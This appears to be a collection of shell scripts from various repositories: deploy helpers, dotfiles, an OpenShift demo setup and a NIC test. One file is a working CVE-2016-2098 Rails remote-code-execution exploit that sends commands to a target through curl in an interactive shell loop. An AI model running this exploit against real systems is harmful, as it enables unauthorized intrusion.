kkellner/certbot-dns
|
/pipeline/setpipeline.sh
|
UTF-8
| 547
| 3.296875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -eu
pipeline_name="generate-cert"
if [ -z ${fly_target:-} ]; then echo "need to set fly_target environment variable"; exit 1; fi
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
export fly_target=${fly_target}
echo "Concourse API target ${fly_target}"
echo "Location: $(basename $DIR)"
pushd $DIR
fly -t ${fly_target} set-pipeline -p ${pipeline_name} -c pipeline.yml -l params.yml
fly -t ${fly_target} unpause-pipeline -p ${pipeline_name}
# fly -t ${fly_target} trigger-job -w -j ${pipeline_name}/generate-cert
popd
| true
|
bbba009434d2bbd9474fa4f871e7556235887bda
|
Shell
|
0ldMate/PentestingStuff
|
/tools/ptl/bash/CVE-2016-2098.sh
|
UTF-8
| 563
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
echo '[+] CVE-2016-2098 POC'
if [ -z "$3" ]
then
echo '[-] USAGE: /bin/bash' $0 '<host> <URI> <cmd>'
echo '[~] Example: /bin/bash' $0 '"http://target.com" "pages?id" "whoami"'
exit -1
fi
host=$1
uri=$2
cmd=$3
while [ "$cmd" != 'exit' ]
do
echo '[+] Executing '$cmd 'on '$host
cmd=`echo "$cmd"|sed 's/ /%20/g'`
curl -i $host'/'$uri'[inline]=%3C%25=%20%25x('$cmd')%20%25%3E' -g
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'
| true
|
2b79f53d2933c8aa9dd1d77d4af5c72812cd6c75
|
Shell
|
xiaoluo260/gluster
|
/file_life_cycle/install.sh
|
UTF-8
| 316
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
cd `dirname $0`
if [ -d "/opt/" ];then
\cp -rf ../file_life_cycle /opt/
fi
# file_life_cycle.service配置
if [ ! -e "/etc/systemd/system/file_life_cycle.service" ];then
\cp -f ./script/file_life_cycle.service /etc/systemd/system/
fi
# locate配置
\cp -f ./src/config/updatedb.conf /etc/updatedb.conf
| true
|
a55183e1d40cd0d5216e60ae776097c81c17504a
|
Shell
|
sandprickle/misc
|
/bin/favorite-wallpaper
|
UTF-8
| 1,369
| 4.03125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Filename: favorite-wallpaper
# Description: Marks/unmarks wallpapers as favorite.
# Maintainer: Jeremy Cantrell <jmcantrell@gmail.com>
# Last Modified: Sun 2010-10-03 02:57:01 (-0400)
# I wrote this script as a helper for my wallpaper manager, Wally, but I
# suppose it could be useful for others.
# IMPORTS {{{1
source bashful-input
source bashful-messages
source bashful-modes
source bashful-utils
# FUNCTIONS {{{1
is_favorite() #{{{2
{
wallpaper-tags -l "$1" | grep -q '^favorite$' && return 0
return 1
}
# VARIABLES {{{1
SCRIPT_NAME=$(basename "$0" .sh)
SCRIPT_ARGUMENTS="[WALLPAPER...]"
SCRIPT_USAGE="Marks/unmarks wallpapers as favorite."
SCRIPT_OPTIONS="-r Remove wallpaper(s) from favorites."
# COMMAND-LINE OPTIONS {{{1
unset OPTIND
while getopts ":hr" option; do
case $option in
r) REMOVE=1 ;;
h) usage 0 ;;
*) usage 1 ;;
esac
done && shift $(($OPTIND - 1))
#}}}1
for w in "$@"; do
# Make sure it's an absolute path
w=$(readlink -f "$w")
if truth $REMOVE; then
is_favorite "$w" || continue
question -p "Remove wallpaper '$w' from favorites?" || continue
wallpaper-tags -r -t favorite "$w"
else
is_favorite "$w" && continue
question -p "Add wallpaper '$w' to favorites?" || continue
wallpaper-tags -a -t favorite "$w"
fi
done
| true
|
fc44b66be6d7bb3b2158601e9bfb8336f3d76429
|
Shell
|
aabmass/aabmass.github.io
|
/deploy-ghpages.sh
|
UTF-8
| 354
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# cd to the directory of this script
cd "$(dirname "$0")"
rm -rf dist/ tmp/
ember build -prod
cd pub-branch
git checkout master
rm -rf *
cp -R ../dist/* .
git add -A
# starts with the -m message than opens the editor
git commit -m "Deployed on `date`" -e
git push
# need to delete these afterwards or ember server fails
rm -rf dist/ tmp/
| true
|
eafc150dac1fcedb2741c22f2532ed56e9a3fb95
|
Shell
|
joeljosephmamalssery/shellScript
|
/break.sh
|
UTF-8
| 103
| 3.109375
| 3
|
[] |
no_license
|
a=0
while [ $a -lt 10 ]
do
if [ $a -eq 7 ]
then
break
else
echo $a
a=`expr $a + 1`
fi
done
| true
|
be0a21eb301662b7f5527c5c9517ff80c8576a76
|
Shell
|
katyhuff/tools
|
/env/bash_profile
|
UTF-8
| 1,651
| 2.921875
| 3
|
[] |
no_license
|
source ~/.bashrc
export EC2_HOME=~/.ec2
PATH=${PATH}:EC2_HOME/bin
export JAVA_HOME=/System/Library/Frameworks/JavaVM.framework/Home/
MKL_NUM_THREADS=1
export MKL_NUM_THREADS
##
# Your previous /Users/khuff/.bash_profile file was backed up as /Users/khuff/.bash_profile.macports-saved_2010-12-24_at_20:11:48
##
# MacPorts Installer addition on 2010-12-24_at_20:11:48: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
# This is where Katy has added stuff by herself...
HDF5_ROOT="/opt/local/lib"
export HDF5_ROOT
CYCLUS_SRC_DIR="Users/khuff/repos/cyclus/src"
export CYCLUS_SRC_DIR
## This makes the terminal tell me where the fuck I am in git
parse_git_branch() {
git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
}
##
# Your previous /Users/khuff/.bash_profile file was backed up as /Users/khuff/.bash_profile.macports-saved_2012-10-20_at_07:14:44
##
# MacPorts Installer addition on 2012-10-20_at_07:14:44: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
# setting the path for mactex
PATH="/usr/texbin:${PATH}"
export PATH
# setting up the path for adb
PATH="${PATH}:/opt/local/etc/adt-bundle-mac-x86_64/sdk/platform-tools"
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
# setting up the python path
PYTHONPATH="/Users/khuff/repos/cyder/output:${PYTHONPATH}"
export PYTHONPATH
| true
|
318b607538c99061fabea06e48fd4b15c2bf7b93
|
Shell
|
nslay/bleak
|
/Experiments/Data/madelon/MakeDB.sh
|
UTF-8
| 1,655
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/sh
GetExeName() {
base_="$1"
for exe_ in "${base_}" "${base_}.exe"
do
if which "${exe_}" > /dev/null 2>&1
then
echo "${exe_}"
return 0
fi
done
return 1
}
MakeCsvFile() {
dataFile_=$1
labelFile_=$2
outCsv_=$3
awk 'BEGIN { line=0; lastFile="" }
{ gsub("\\r","") }
FILENAME == ARGV[1] {
if (lastFile != FILENAME) {
lastFile=FILENAME
line=0
}
delete values
split($0, values, " ")
row=values[1]
for (i = 2; i <= length(values); ++i)
row = row "," values[i]
table[line++] = row
}
FILENAME == ARGV[2] {
if (lastFile != FILENAME) {
lastFile=FILENAME
line=0
}
table[line] = table[line] "," $0
++line
}
END {
for (i = 0; i < length(table); ++i) {
print table[i]
}
}' "${dataFile_}" "${labelFile_}" > "${outCsv_}"
}
searchCmd="bleakMakeDatabase"
makeDBCmd=`GetExeName "${searchCmd}"`
if [ -z "${makeDBCmd}" ]
then
echo "Error: ${searchCmd} must be in PATH" 1>&2
exit 1
fi
trainDataFile="madelon_train.data"
trainLabelFile="madelon_train.labels"
testDataFile="madelon_valid.data"
testLabelFile="madelon_valid.labels"
MakeCsvFile "${trainDataFile}" "${trainLabelFile}" "train_all.data"
MakeCsvFile "${testDataFile}" "${testLabelFile}" "test.data"
#exit
shuf train_all.data > train_shuffled.data
head -n 1500 train_shuffled.data > train.data
tail -n 500 train_shuffled.data > validation.data
"${makeDBCmd}" -o madelon_train.lmdb -c mappings.ini train.data
"${makeDBCmd}" -o madelon_validation.lmdb -c mappings.ini validation.data
"${makeDBCmd}" -o madelon_test.lmdb -c mappings.ini test.data
| true
|
dd48ca0597286a49df251d7f1ff6adb35c094ad3
|
Shell
|
ewave-com/devbox-windows
|
/tools/main.ps1
|
UTF-8
| 6,435
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# import global variables
. require_once "$devbox_root/tools/system/constants.ps1"
# import output functions (print messages)
. require_once "$devbox_root/tools/system/output.ps1"
# import devbox state function
. require_once "${devbox_root}/tools/devbox/devbox-state.ps1"
# import infrastructure functions
. require_once "$devbox_root/tools/devbox/infrastructure.ps1"
# import docker image functions
. require_once "${devbox_root}/tools/docker/docker-image.ps1"
# import main project functions entrypoint
. require_once "$devbox_root/tools/project/project-main.ps1"
# import common functions for all projects structure
. require_once "$devbox_root/tools/project/all-projects.ps1"
# import platform-tools functions
. require_once "$devbox_root/tools/project/platform-tools.ps1"
# import functions to show project information after start
. require_once "$devbox_root/tools/print/print-project-info.ps1"
############################ Public functions ############################
function start_devbox_project($_selected_project = "", $_no_interaction = $false) {
show_success_message "Starting DevBox project '${_selected_project}'" "1"
ensure_project_configured ${_selected_project}
if ((is_project_started $_selected_project)) {
show_warning_message "Project '${_selected_project}' is already started."
show_warning_message "Please ensure selected project is correct, or stop it and try to start again."
exit 1
}
# initialize basic project variables and directories
init_selected_project "$_selected_project"
show_success_message "Starting common infrastructure." "1"
# Start common infra services, e.g. portainer, nginx-reverse-proxy, mailer, etc.
dotenv_export_variables "${dotenv_infra_filepath}"
start_infrastructure "${dotenv_infra_filepath}"
show_success_message "Starting project" "1"
# Prepare all required configs and start project services
start_project
show_success_message "Project '${_selected_project}' was successfully started" "1"
# Print final project info
print_info
if (-not $_no_interaction) {
# Run platform tools menu inside web-container
run_platform_tools
}
# Unset all used variables
dotenv_unset_variables "${dotenv_infra_filepath}"
dotenv_unset_variables "$project_up_dir/.env"
}
function stop_devbox_project($_selected_project = "") {
ensure_project_configured ${_selected_project}
if (-not (is_project_started $_selected_project)) {
show_warning_message "DevBox project '${_selected_project}' is already stopped" "1"
return
}
show_success_message "Stopping DevBox project '${_selected_project}'" "1"
# initialize basic project variables and directories
init_selected_project "${_selected_project}"
stop_current_project
show_success_message "Project '${_selected_project}' was successfully stopped" "1"
}
function down_devbox_project($_selected_project = "") {
show_success_message "Downing and cleaning DevBox project '${_selected_project}'" "1"
# initialize basic project variables and directories
init_selected_project "${_selected_project}"
down_current_project
show_success_message "Project '${_selected_project}' was successfully downed and cleaned" "1"
}
function down_and_clean_devbox_project($_selected_project = "") {
show_success_message "Downing and cleaning DevBox project '${_selected_project}'" "1"
# initialize basic project variables and directories
init_selected_project "${_selected_project}"
down_and_clean_current_project
show_success_message "Project '${_selected_project}' was successfully downed and cleaned" "1"
}
function stop_devbox_all() {
show_success_message "Stopping all DevBox projects" "1"
# Stop all project containers
foreach ($_selected_project in ((get_project_list).Split(','))) {
if (is_project_configured ${_selected_project}) {
stop_devbox_project "$_selected_project"
}
}
show_success_message "Stopping common infrastructure." "1"
stop_infrastructure "${dotenv_infra_filepath}"
show_success_message "DevBox was successfully stopped" "1"
}
function down_devbox_all() {
show_success_message "Downing and cleaning all DevBox projects" "1"
# Stop all project containers
foreach ($_selected_project in ((get_project_list).Split(','))) {
if (is_project_configured ${_selected_project}) {
down_devbox_project "$_selected_project"
}
}
show_success_message "Stopping common infrastructure." "1"
stop_infrastructure "${dotenv_infra_filepath}"
show_success_message "DevBox was successfully downed and cleaned" "1"
}
function down_and_clean_devbox_all() {
show_success_message "Down and cleaning all DevBox projects" "1"
# Stop all project containers
foreach ($_selected_project in ((get_project_list).Split(','))) {
if (is_project_configured ${_selected_project}) {
down_and_clean_devbox_project "$_selected_project"
}
}
show_success_message "Stopping common infrastructure." "1"
stop_infrastructure "${dotenv_infra_filepath}"
show_success_message "DevBox was successfully downed and cleaned" "1"
}
function docker_destroy() {
show_success_message "Purging all DevBox services, containers and volumes" "1"
show_warning_message "Pay attention this action is only for emergency purposes when something went wrong and regular stopping does not work"
show_warning_message "All files left of places and you will need to cleanup it manually if required."
show_warning_message "This operation will kill and destroy all running docker data e.g. containers and volumes"
destroy_all_docker_services
show_success_message "Docker data was successfully purged" "1"
}
function update_docker_images_if_required() {
if (-not $docker_images_autoupdate) {
return
}
$_last_updated_since = (get_devbox_state_docker_images_updated_at_diff)
if (-not ${_last_updated_since} -or ([int]${_last_updated_since} -gt 2592000)) { # 2592000 = 30 days
show_success_message "Looking for docker image updates" "1"
refresh_existing_docker_images
set_devbox_state_docker_images_updated_at ([int](Get-Date -UFormat %s -Millisecond 0))
}
}
############################ Public functions end ############################
| true
|
9edd6acdca48f3723d8f7aa87768533ddf81a89b
|
Shell
|
nk53/bash_utils_macos
|
/fullpath
|
UTF-8
| 124
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# The opposite of basename
if [ -e "$1" ]; then
echo $PWD/$1
exit 0
fi
echo "No such file: $1"
exit 1
| true
|
a15cb0ece4e1e0e370eb6fd0ef686dce3d799e84
|
Shell
|
ilventu/aur-mirror
|
/lkeyholetv/PKGBUILD
|
UTF-8
| 3,108
| 2.71875
| 3
|
[] |
no_license
|
# Contributor/Maintainer: ilikenwf/Matt Parnell <parwok@gmail.com>
pkgname=lkeyholetv
pkgver=1.26
pkgrel=1
pkgdesc="Live TV Viewer (Mostly Japanese Streams)...Server only works on windows version"
arch=('i686' 'x86_64')
provides=('keyholetv')
url="http://www.v2p.jp/video/english/"
depends=('alsa-lib' 'gtk2' 'cairo' 'pango' 'libx11' 'libpng')
license=('custom')
source=("http://www.v2p.jp/video/Viewer/Linux/32bits/LKeyHoleTV${pkgver}-32bits.tar.gz"
'lkeyholetv.desktop'
'lkeyholetv')
md5sums=('7db6862554a1db0d0a87bd3b8012617b'
'905a8951b107054187d7228cb390ce62'
'ae00db79eb19f3f1515f873852c903d2')
[ "$CARCH" = "x86_64" ] && source=("http://www.v2p.jp/video/Viewer/Linux/64bits/LKeyHoleTV${pkgver}-64bits.tar.gz"
'lkeyholetv.desktop'
'lkeyholetv') \
&& md5sums=('e67c914267dafbb1b93181359b296b66'
'905a8951b107054187d7228cb390ce62'
'ae00db79eb19f3f1515f873852c903d2')
build()
{
cd ${srcdir}/KeyHoleTV
mkdir -p ${pkgdir}/{usr/{bin,share/{applications,pixmaps}},opt/LKeyHoleTV} || return 1
# Audio Interface: ALSA should work
# ...try DSP or ESD if it doesn't by replacing ALSA appropriately below
cd ${srcdir}/KeyHoleTV/ALSA
make || return 1
make install || return 1 # Weird, but correct
# Language: unless you want Japanese
# ...don't replace en_US with ja_JP
cd ${srcdir}/KeyHoleTV/en_US
make || return 1
make install || #Weird, but correct
# Time to install the program itself
install -c ${srcdir}/KeyHoleTV/.KeyHoleTV ${pkgdir}/opt/LKeyHoleTV/
install -c ${srcdir}/KeyHoleTV/lkeyholetv ${pkgdir}/opt/LKeyHoleTV/
cp -r ${srcdir}/KeyHoleTV/.KeyHoleTV ${pkgdir}/opt/LKeyHoleTV/
install -c ${srcdir}/lkeyholetv ${pkgdir}/usr/bin/
install -m644 ${srcdir}/lkeyholetv.desktop ${pkgdir}/usr/share/applications/ || return 1
install -m644 ${srcdir}/KeyHoleTV/keyholetv.xpm ${pkgdir}/usr/share/pixmaps/keyholetv.xpm || return 1
msg "
Copyright 2006 by Takashi Kosaka OISEYER(C) All rights reserved.
Redistribution and use in binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE."
}
| true
|
1ca4b3c80fac3782e4be7511b0befe64bc5ebb69
|
Shell
|
parsoj/counter-db
|
/bin/challenge_executable
|
UTF-8
| 294
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
if ! which go >/dev/null; then
echo "This App is written in Golang. Please install Go 1.6"
exit 1
fi
if [ "$GOPATH" = "" ]; then
echo "please set the environment variable GOPATH to point to the 'challenge' directory"
exit 1
fi
go run $GOPATH/src/db/server/server.go
| true
|
6e61b164f6b1e9fa5c9e0a891408dcdc1c595462
|
Shell
|
Jackojc/dots
|
/scripts/dmenu/usb/prompt_usb_mount
|
UTF-8
| 399
| 3.640625
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
THING=$(usb_get_unmounted)
if [ -z "$THING" ]; then
notify_usb "no mountable drives!"
exit 1
fi
TARGET=$(echo "$THING" | dmenu -p "mount")
if [ -z "$TARGET" ]; then
exit 1
fi
BLOCKNAME=$(echo "$TARGET" | awk '{print $1}')
usb_mount $BLOCKNAME && notify_usb "$TARGET is now mounted!"
mount="$(lsblk -lnpo MOUNTPOINT $BLOCKNAME)"
echo spacefm "$mount" | sh &
| true
|
0f4cf453304551c5250c1af55d98bf5384a3e797
|
Shell
|
dingyu1/business-tests
|
/auto-test/delivery/network/basic_function/onboard_Function_001.sh
|
UTF-8
| 5,375
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
#*****************************************************************************************
# *用例ID:Function_001
# *用例名称:李仁性
# *用例功能:板载端口检查
# *作者:LWX638710
# *完成时间:2019-5-04
#预置条件:
#1、安装ubuntu18.04.1操作系统的D06服务器1台
#2、单板卡从片riser卡PCIe上槽位上插Mellanox 25G网卡
#测试步骤:
#1 进入操作系统
#2 使用ip a命令检查是否能观察到板载所有网口
#3 使用ethtool命令查询每个网口的信息
#预期结果:
#1 能检查到板载的两个光口、两个电口和1个100G网口
#*****************************************************************************************
#加载公共函数
. ../../../../utils/error_code.inc
. ../../../../utils/test_case_common.inc
. ../../../../utils/sys_info.sh
. ../../../../utils/sh-test-lib
#. ./utils/error_code.inc
#. ./test_case_common.inc
#获取脚本名称作为测试用例名称
test_name=$(basename $0 | sed -e 's/\.sh//')
#创建log目录
TMPDIR=./logs/temp
mkdir -p ${TMPDIR}
#存放脚本处理中间状态/值等
TMPFILE=${TMPDIR}/${test_name}.tmp
#存放每个测试步骤的执行结果
RESULT_FILE=${TMPDIR}/${test_name}.result
TMPCFG=${TMPDIR}/${test_name}.tmp_cfg
test_result="pass"
#预置条件
function init_env()
{
#检查结果文件是否存在,创建结果文件:
PRINT_LOG "INFO" "*************************start to run test case<${test_name}>**********************************"
fn_checkResultFile ${RESULT_FILE}
command -v ethtool
if [ $? -ne 0 ]
then
fn_install_pkg ethtool 3
fi
}
#测试步骤函数
function test_case()
{
niclist=`ls -l /sys/class/net|grep -v virtual|awk -F"/" '{print $NF}'|grep -v ^total`
firbe_nic_num=0
tp_nic_num=0
for i in $niclist
do
driver=`ethtool -i $i|grep "driver: "|awk '{print $2}'`
if [ "$driver" == "hns3" ] || [ "$driver" == "hns" ]
then
nic_type=`ethtool $i|grep "Supported ports:"|awk '{print $4}'`
if [ "$nic_type" == "FIBRE" ];then
ethtool $i|grep -A2 "Supported link modes:"|grep "10000base"
if [ $? -eq 0 ];then
let firbe_nic_num=$firbe_nic_num+1
PRINT_LOG "INFO" "check FIBRE $i success,the current onboard nic is 10G,the current onboard nic num is $firbe_nic_num "
fn_writeResultFile "${RESULT_FILE}" "${i}_check" "pass"
fi
elif [ "$nic_type" == "TP" ];then
ethtool $i|grep -A2 "Supported link modes:"|grep "1000baseT"
if [ $? -eq 0 ];then
let tp_nic_num=$tp_nic_num+1
PRINT_LOG "INFO" "check TP $i success,the current onboard nic num is $tp_nic_num "
fn_writeResultFile "${RESULT_FILE}" "${i}_check" "pass"
else
PRINT_LOG "FATAL" "check TP $i fail,the current onboard nic num is $tp_nic_num "
fn_writeResultFile "${RESULT_FILE}" "${i}_check" "fail"
fi
else
PRINT_LOG "FATAL" "check the nic type fail,please check manually"
fn_writeResultFile "${RESULT_FILE}" "${i}_check" "fail"
fi
fi
done
if [ $tp_nic_num -eq 2 ];then
PRINT_LOG "INFO" "The onboard NIC_TP num is $tp_nic_num, is equal to 2 "
fn_writeResultFile "${RESULT_FILE}" "onboard_tp_check_num" "pass"
else
PRINT_LOG "FATAL" "The onboard NIC_TP num is $tp_nic_num, is not equal to 2 "
fn_writeResultFile "${RESULT_FILE}" "onboard_tp_check_num" "fail"
fi
if [ $firbe_nic_num -eq 2 ];then
PRINT_LOG "INFO" "The onboard NIC_firbe num is $firbe_nic_num, is equal to 2 "
fn_writeResultFile "${RESULT_FILE}" "onboard_check_num" "pass"
else
PRINT_LOG "FATAL" "The onboard NIC_firbe num is $firbe_nic_num, is not equal to 2 "
fn_writeResultFile "${RESULT_FILE}" "onboard_check_num" "fail"
fi
check_result ${RESULT_FILE}
}
#恢复环境
function clean_env()
{
#清除临时文件
FUNC_CLEAN_TMP_FILE
#自定义环境恢复实现部分,工具安装不建议恢复
#需要日志打印,使用公共函数PRINT_LOG,用法:PRINT_LOG "INFO|WARN|FATAL" "xxx"
PRINT_LOG "INFO" "*************************end of running test case<${test_name}>**********************************"
}
function main()
{
init_env || test_result="fail"
if [ ${test_result} = "pass" ]
then
test_case || test_result="fail"
fi
clean_env || test_result="fail"
[ "${test_result}" = "pass" ] || return 1
}
main $@
ret=$?
#LAVA平台上报结果接口,勿修改
lava-test-case "$test_name" --result ${test_result}
exit ${ret}
| true
|
c8c001cf28670a1a8053d0a5f29f4837fb0892bc
|
Shell
|
jbjonesjr/devnation-federal-2017
|
/probot-demo/setup.sh
|
UTF-8
| 4,014
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
# Configuration
. ./config.sh || { echo "FAILED: Could not configure" && exit 1 ; }
# Additional Configuration
# NONE
# See https://docs.openshift.com/enterprise/latest for general openshift docs
echo "Create a Devnation Fedevnation-visitorsderal 2017 demo environment"
echo " --> make sure we are logged in"
echo " --> create a project for our work"
oc project ${OPENSHIFT_PROJECT} || oc new-project ${OPENSHIFT_PROJECT} ${OPENSHIFT_PROJECT_DESCRIPTION+"--description"} ${OPENSHIFT_PROJECT_DESCRIPTION} ${OPENSHIFT_PROJECT_DISPLAY_NAME+"--display-name"} ${OPENSHIFT_PROJECT_DISPLAY_NAME} || { echo "FAILED: could not create project" && exit 1 ; }
oc whoami || oc login master.rhsademo.net -u ${OPENSHIFT_USER} -p ${OPENSHIFT_RHSADEMO_USER_PASSWORD_DEFAULT}
echo "========== STATUS QUO deployment =========="
echo " --> Create the ${OPENSHIFT_APPLICATION_BACKEND_NAME} application from the mysql-ephemeral template"
oc get dc/mysql || oc new-app mysql-ephemeral --name=mysql -l app=${OPENSHIFT_APPLICATION_NAME},part=${OPENSHIFT_APPLICATION_BACKEND_NAME} --param=MYSQL_USER=myphp --param=MYSQL_PASSWORD=myphp --param=MYSQL_DATABASE=myphp || { echo "FAILED: Could find or create the ${OPENSHIFT_APPLICATION_BACKEND_NAME} for ${OPENSHIFT_APPLICATION_NAME}" && exit 1; }
echo " --> Create ${OPENSHIFT_APPLICATION_FRONTEND_NAME} application from the php:5.6 template and application git repo"
oc get dc/php || oc new-app php:5.6~https://github.com/michaelepley/phpmysqldemo.git#devnation-probot --name=php -l app=${OPENSHIFT_APPLICATION_NAME},part=${OPENSHIFT_APPLICATION_FRONTEND_NAME},demophase=statusquo -e MYSQL_SERVICE_HOST=mysql.${OPENSHIFT_PROJECT}.svc.cluster.local MYSQL_SERVICE_PORT=3306 -e MYSQL_SERVICE_DATABASE=myphp -e MYSQL_SERVICE_USERNAME=myphp -e MYSQL_SERVICE_PASSWORD=myphp || { echo "FAILED: Could find or create ${OPENSHIFT_APPLICATION_FRONTEND_NAME} for ${OPENSHIFT_APPLICATION_NAME}" && exit 1; }
echo " --> configure the application with fairly minimal resources"
oc get dc/php && oc patch dc/php -p '{"spec" : { "template" : { "spec" : { "containers" : [ { "name" : "php", "resources" : { "limits" : { "cpu" : "400m" }, "requests" : { "cpu" : "200m" } } } ] } } } }' || { echo "FAILED: Could not patch application" && exit 1; }
echo " --> configure the application with liveness and readiness checks"
oc set probe dc/php --liveness --readiness --get-url=http://:8080/ --failure-threshold=4 --timeout-seconds=4
echo " --> Waiting for the ${OPENSHIFT_APPLICATION_FRONTEND_NAME} application to start....press any key to proceed"
while ! oc get pods | grep php | grep Running ; do echo -n "." && { read -t 1 -n 1 && break ; } && sleep 1s; done; echo ""
echo " --> Expose the generic endpoint"
oc get route php || oc expose service php || { echo "FAILED: Could not verify route to application frontend" && exit 1; } || { echo "FAILED: Could patch frontend" && exit 1; }
echo " --> Expose an endpoint for external users...start them with the default app"
oc get route devnation-visitors || oc expose service php --name devnation-visitors -l app=${OPENSHIFT_APPLICATION_NAME} --hostname="devnation-visitors.apps.rhsademo.net"
echo " --> and for convenience, lets group the frontend and backend"
oc get svc/php && oc patch svc/php -p '{"metadata" : { "annotations" : { "service.alpha.openshift.io/dependencies" : "[ { \"name\" : \"mysql\" , \"kind\" : \"Service\" } ]" } } }' || { echo "FAILED: Could not patch application" && exit 1; }
#firefox php-${OPENSHIFT_PROJECT}.apps.rhsademo.net?refresh=10
echo " --> extracting the object definitions"
oc get bc/php -o json > ocp-myphp-php-build.json
oc get dc/php -o json > ocp-myphp-php-deploy.json
oc get svc/php -o json > ocp-myphp-php-service.json
oc get is/php -o json > ocp-myphp-php-imagestream.json
oc get route/devnation-visitors -o json > ocp-myphp-php-route.json
echo " --> load the probot application with these objects & start it"
echo " --> then, file a pull request against the repository"
echo "Done"
| true
|
ed1a45f200465762f943e0e40d4d1b596b6dfa8d
|
Shell
|
RVxLab/dotfiles
|
/dotfiles/scripts/bin/laravel.starship.sh
|
UTF-8
| 2,332
| 4.09375
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -euo pipefail
STARSHIP_CACHE_DIR="/tmp/starship-cache"
JSON_FILE="$STARSHIP_CACHE_DIR/laravel.json"
VERSION_NOT_FOUND="___VERS_NOT_FOUND___"
check_artisan() {
if [ -f "$PWD/artisan" ] && [ -d "$PWD/vendor" ]
then
return 0
else
return 1
fi
}
get_laravel_version() {
php artisan --version | awk '{ print $3 }'
}
get_project_name() {
basename "$PWD"
}
check_dependencies() {
if ! command -v jq > /dev/null
then
return 1
fi
return 0
}
create_json_file_if_needed() {
if [ ! -d "$STARSHIP_CACHE_DIR" ]
then
mkdir -p "$STARSHIP_CACHE_DIR"
fi
if [ ! -f "$STARSHIP_CACHE_DIR/laravel.json" ]
then
echo "{}" > "$JSON_FILE"
fi
}
get_entry() {
local NAME="${1-}"
if [ -z "$NAME" ]
then
exit 2
fi
jq -r --arg notfound "$VERSION_NOT_FOUND" --arg key "$NAME" '.[$key] // $notfound' "$JSON_FILE"
}
update_entry() {
local NAME="${1-}"
if [ -z "$NAME" ]
then
exit 2
fi
local VERSION=$(get_laravel_version)
local TMP_FILE=$(mktemp)
jq --arg key "$NAME" --arg value "$VERSION" '.[$key] = $value' "$JSON_FILE" > "$TMP_FILE"
mv -f "$TMP_FILE" "$JSON_FILE"
echo "$VERSION"
}
did_version_change() {
local NAME="${1-}"
if [ -z "$NAME" ]
then
return 1
fi
if [ ! -f "composer.lock" ]
then
return 1
fi
local COMPOSER_CHECKSUM=$(jq -r '."content-hash"' "composer.lock")
local CHECKSUM_FILE="$STARSHIP_CACHE_DIR/$NAME.checksum"
local CHECKSUM=""
if [ -f "$CHECKSUM_FILE" ]
then
local CHECKSUM=$(cat "$CHECKSUM_FILE")
fi
if [ "$COMPOSER_CHECKSUM" == "$CHECKSUM" ]
then
return 1
fi
echo "$COMPOSER_CHECKSUM" > "$CHECKSUM_FILE"
return 0
}
if ! check_artisan
then
# Not in a valid Laravel project
exit 0
fi
if ! check_dependencies
then
echo "Missing dependencies" >2
exit 1
fi
NAME=$(get_project_name)
create_json_file_if_needed
if did_version_change "$NAME"
then
CACHED_VERSION=$(get_laravel_version)
update_entry "$NAME" > /dev/null &
else
CACHED_VERSION=$(get_entry "$NAME")
fi
if [ "$CACHED_VERSION" = "$VERSION_NOT_FOUND" ]
then
echo $(update_entry "$NAME")
else
echo "$CACHED_VERSION"
fi
| true
|
d72ca73756697920cbef6a54036c61b950989d18
|
Shell
|
tadruj/tadruj.github.io
|
/code/devops/vagrant/hhvm/bin/mysql.rm
|
UTF-8
| 397
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -z "$1" ]; then
echo "Usage: mysql.rm <username>"
exit
fi
echo -n "Enter MySQL root pass:"
read MYSQL_PASS
mysql -uroot -p${MYSQL_PASS} -e "drop database ${1}" mysql
mysql -uroot -p${MYSQL_PASS} -e "delete from user where user='${1}'" mysql
mysql -uroot -p${MYSQL_PASS} -e "delete from db where user='${1}'" mysql
mysql -uroot -p${MYSQL_PASS} -e "flush privileges" mysql
| true
|
305981901f1d79c9bc633721ea92b3e93ef44dfa
|
Shell
|
jarek1402b2/deterministic-kernel
|
